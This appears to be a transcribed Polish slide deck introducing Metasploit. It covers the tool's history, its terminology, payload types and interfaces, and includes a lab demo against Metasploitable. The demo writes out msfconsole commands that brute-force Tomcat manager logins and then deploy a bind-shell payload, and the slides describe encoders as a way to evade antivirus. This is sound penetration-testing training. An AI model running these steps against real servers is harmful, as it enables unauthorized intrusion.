Metasploit Part 1

Transkrypt

Metasploit Part 1
Metasploit Part 1
The Beginning
Agenda
•
•
•
•
•
•
Co to jest Metasploit?
Historiia
Terminologia
Rodzaje Payload’ów
Opisy modułów
Podstawy Konsoli
Metasploit... czyli?
• Framework do pentestów
• Napisany w Ruby
• Zawiera w sobie: Exploity, Payloads, Auxiliaries,
Automation Tools, i wiele innych...
•
•
•
•
Wieloplatformowy
Wsparcie Developerów
Możliwośd pisania własnych wtyczek
OpenSource weeeee... :]
„A little bit about this shit”
Metasploit zostal przygotowany w 2003 roku w jezyku Perl. Od
wersji 3.0 zostal calkowicie przepisany w jezyku Ruby. Srodowisko
moze byc uruchamiane na wielu wersjach systemu Unix i Linux oraz
w systemie Windows.
W pazdzierniku 2009 projekt Metasploit zostal przejety przez firme
Rapid 7 specjalizujaca sie w oprogramowaniu do zarzadzania
podatnosciami systemów.
(WiKi)
Terminologia
Exploit (eksploatowad kogoś lub coś)
The vector for getting into the system, whether it
be because of a vulnerability or a bad config
Payload (Ładunek)
What you want the exploit to do.
Encoders (Programy szyfrujące)
Ways to mangle the code so anti-malware apps
won’t detect the payload
Auxillary (pomocniczy)
Just another fun little app that comes with
Metasploit
(IRONGEEK)
Rodzaje PayLoad’ów
- Inline
All the shellcode to be executed goes with the payload. More
stable, but may be too big.
- Staged (pl. Stopniowanie)
The payload is just a small stub that grabs the rest of the shell code
after the exploit works. Smaller, and less for AV to grab a hold of.
-Reverse
Instead of having to establish a connection in after an exploit
works, the payload connects back you. This has a better chance of
getting around firewalls with weak egress filtering.
- NoNX
These payloads try to work around things like DEP (Data Execution
Prevention)
(IRONGEEK)
Ale Metasploit to nie...
Czasem schemat używania to:
1. Ustawid rodzaj exploit’a
2. Ustawid rodzaj payload’a
3. Ustawid cel naszej zabawy
4. Iśd po piwo...
5. Cieszyd się kontrolą ;]
To nie wszystko co potrafi Metasploit... On potrafi wiele więcej...
Piękny Prosty Interfejs
MsfConsole:
Piękny Prosty Interfejs
MsfCli:
Piękny Prosty Interfejs
MsfGui:
Piękny Prosty Interfejs
Piękny Prosty Interfejs
MsfWEB:
A teraz zalety i wady
MsfConsole:
+ Najlepiej wspierany interfejs frameworka
+ Prawie wszystkie opcje są dostępne
- Nie jako "wskaż i kliknij w msggui / msfweb
Msfcli
+ Łatwo dodad dobrodziejstwa metasploita do własnego skryptu
- Nie jest tak dobrze wspierany jak msfconsole
- Cięższy do użycia
A teraz zalety i wady
Msfweb
+Fajny Interfejs
+Łatwy do zrozumienia treści
+Dobry do pokazania prostych ataków
-Nie jest tak dobrze wspierany jak msfconsole
-Wolny
Msfgui
+ Fajny Interfejs
+ Własne skórki
(IRONGEEK)
Podstawy Konsoli
Polecenia:
help
search
set
setg
show (options/advanced/etc)
exploit/run
sessions –l
sessions -i 1
Demo
Sytuacja 1:
Serwer
Ubuntu
Hacker
Używane rzeczy
• BackTrack w wersji 5
• Metasploit 3.7.0
• Nmap
• Metasploitable
Atak cz. 1
• Skan sieci w poszukiwaniu hosta:
$~> nmap –v –sn 192.168.10.0/24
• Skan hosta nmapem
• Atak 1
Atak cz. 1
msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit
Atak cz. 1
Rezultat: mamy login i hasło
Cel: zdobyd shell ;]
Atak cz. 2
msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit
Atak cz. 2
Posiadamy shella, więc możemy dalej psocid.
Metasploit Part 1
Q&A
The Beginning
Linki
(WiKi) http://wikipedia.pl
(IRONGEEK) http://irongek.com
http://www.offensive-security.com/metasploit-unleashed/
http://www.metasploit.com/
http://backtrack-linux.org
Metasploit Part 1
THX ;]
The Beginning

Podobne dokumenty